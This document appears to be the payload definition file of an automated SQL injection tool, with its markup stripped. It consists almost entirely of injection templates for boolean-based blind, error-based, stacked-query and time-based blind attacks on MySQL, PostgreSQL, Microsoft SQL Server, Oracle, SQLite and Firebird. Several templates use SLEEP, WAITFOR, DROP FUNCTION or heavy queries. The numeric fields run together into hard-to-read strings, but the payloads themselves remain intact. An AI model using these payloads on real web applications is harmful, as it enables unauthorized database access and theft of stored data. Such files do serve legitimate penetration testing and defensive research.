3 1 1,2 1 ) 4 1 1,2 2 ') 3 1 1,2 2 ' 5 1 1,2 4 " 1 1 1,2 1 ) AND ([RANDNUM]=[RANDNUM] 2 1 1,2 1 )) AND (([RANDNUM]=[RANDNUM] 3 1 1,2 1 ))) AND ((([RANDNUM]=[RANDNUM] 1 0 1,2,3 1 1 1 1,2 2 ') AND ('[RANDSTR]'='[RANDSTR] 2 1 1,2 2 ')) AND (('[RANDSTR]'='[RANDSTR] 3 1 1,2 2 '))) AND ((('[RANDSTR]'='[RANDSTR] 1 1 1,2 2 ' AND '[RANDSTR]'='[RANDSTR] 2 1 1,2 3 ') AND ('[RANDSTR]' LIKE '[RANDSTR] 3 1 1,2 3 ')) AND (('[RANDSTR]' LIKE '[RANDSTR] 3 1 1,2 3 '))) AND ((('[RANDSTR]' LIKE '[RANDSTR] 2 1 1,2 3 ' AND '[RANDSTR]' LIKE '[RANDSTR] 3 1 1,2 4 ") AND ("[RANDSTR]"="[RANDSTR] 4 1 1,2 4 ")) AND (("[RANDSTR]"="[RANDSTR] 4 1 1,2 4 "))) AND ((("[RANDSTR]"="[RANDSTR] 2 1 1,2 4 " AND "[RANDSTR]"="[RANDSTR] 4 1 1,2 5 ") AND ("[RANDSTR]" LIKE "[RANDSTR] 5 1 1,2 5 ")) AND (("[RANDSTR]" LIKE "[RANDSTR] 5 1 1,2 5 "))) AND ((("[RANDSTR]" LIKE "[RANDSTR] 3 1 1,2 5 " AND "[RANDSTR]" LIKE "[RANDSTR] AND boolean-based blind - WHERE or HAVING clause 1 1 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]
MySQL
AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] -- AND [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause 1 2 3 1 2 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] OR NOT [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 3 3 1 2 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] # OR NOT [RANDNUM]=[RANDNUM1]
MySQL
OR boolean-based blind - WHERE or HAVING clause (Generic comment) 1 3 3 1 2 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] -- OR NOT [RANDNUM]=[RANDNUM1] MySQL boolean-based blind - WHERE or HAVING clause (RLIKE) 1 3 1 1 1 RLIKE IF([INFERENCE],[ORIGVALUE],0x28) RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28) RLIKE IF([RANDNUM]=[RANDNUM],[ORIGVALUE],0x28)
MySQL
Generic boolean-based blind - Parameter replace 1 2 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) Generic boolean-based blind - Parameter replace (original value) 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 3 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL >= 5.0 boolean-based blind - Parameter replace 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - Parameter replace 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Windows
Oracle boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) 1 4 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Windows
Oracle boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
MySQL stacked conditional-error blind queries 1 3 0 0 1 ; IF(([INFERENCE]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); ; IF(([RANDNUM]=[RANDNUM]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]); # ; IF(([RANDNUM]=[RANDNUM1]), SELECT [RANDNUM], DROP FUNCTION [RANDSTR]);
MySQL
PostgreSQL stacked conditional-error blind queries 1 3 0 0 2 ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END); -- ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);
PostgreSQL
Microsoft SQL Server/Sybase stacked conditional-error blind queries 1 3 0 0 1 ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]; -- ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];
Microsoft SQL Server Windows
MySQL >= 5.0 AND error-based - WHERE or HAVING clause 2 1 0 1 1 AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL AND error-based - WHERE or HAVING clause 2 1 0 1 1 AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause 2 1 0 1 1 AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Windows
Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) 2 2 0 1 1 AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Windows
Oracle AND error-based - WHERE or HAVING clause (XMLType) 2 1 0 1 1 AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address) 2 2 0 1 1 AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle >= 8.1.6
Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn) 2 3 0 1 1 AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird AND error-based - WHERE or HAVING clause 2 2 0 1 1 AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
MySQL OR error-based - WHERE or HAVING clause 2 2 0 1 2 OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) # [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL
PostgreSQL OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Windows
Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) 2 3 2 1 2 OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Windows
Oracle OR error-based - WHERE or HAVING clause (XMLType) 2 2 2 1 2 OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address) 2 3 2 1 2 OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle >= 8.1.6
Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn) 2 4 2 1 2 OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM], '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird OR error-based - WHERE or HAVING clause 2 3 2 1 2 OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - Parameter replace 2 3 0 1,2,3 3 (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL error-based - Parameter replace 2 3 0 1,2,3 3 (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - Parameter replace 2 3 0 1,3 3 (CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Windows
Oracle error-based - Parameter replace 2 3 0 1,3 3 (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird error-based - Parameter replace 2 4 0 1,3 3 (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 , (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - ORDER BY clause 2 3 0 3 1 , (CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Windows
Oracle error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
MySQL > 5.0.11 stacked queries 4 1 0 0 1 ; IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]); ; SELECT SLEEP([SLEEPTIME]); #
MySQL > 5.0.11
MySQL < 5.0.12 stacked queries (heavy query) 4 2 2 0 1 ; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]); ; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')); #
MySQL
PostgreSQL > 8.1 stacked queries 4 1 0 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); ; SELECT PG_SLEEP([SLEEPTIME]); --
PostgreSQL > 8.1
PostgreSQL stacked queries (heavy query) 4 2 2 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END); ; SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000); --
PostgreSQL
PostgreSQL < 8.2 stacked queries (Glibc) 4 4 0 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END); ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); --
PostgreSQL < 8.2 Linux
Microsoft SQL Server/Sybase stacked queries 4 1 0 0 1 ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'; ; WAITFOR DELAY '0:0:[SLEEPTIME]'; --
Microsoft SQL Server Windows
Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) 4 5 0 0 1 ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL; ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME]) FROM DUAL; --
Oracle
Oracle stacked queries (heavy query) 4 5 2 0 1 ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL; ; SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5; --
Oracle
Oracle stacked queries (DBMS_LOCK.SLEEP) 4 5 0 0 1 ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END; ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; --
Oracle
Oracle stacked queries (USER_LOCK.SLEEP) 4 5 0 0 1 ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END; ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END; --
Oracle
SQLite > 2.0 stacked queries (heavy query) 4 3 2 0 1 ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END); ; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000)))); --
SQLite > 2.0
Firebird stacked queries (heavy query) 4 3 2 0 1 ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE; ; SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3; --
Firebird >= 2.0
MySQL > 5.0.11 AND time-based blind 5 1 1 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) AND SLEEP([SLEEPTIME])
MySQL > 5.0.11
MySQL > 5.0.11 AND time-based blind (comment) 5 4 1 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]) AND SLEEP([SLEEPTIME]) #
MySQL > 5.0.11
MySQL < 5.0.12 AND time-based blind (heavy query) 5 2 2 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))
MySQL
MySQL < 5.0.12 AND time-based blind (heavy query - comment) 5 5 2 1,2,3 1 AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]) AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')) #
MySQL
PostgreSQL > 8.1 AND time-based blind 5 1 1 1,2,3 1 AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
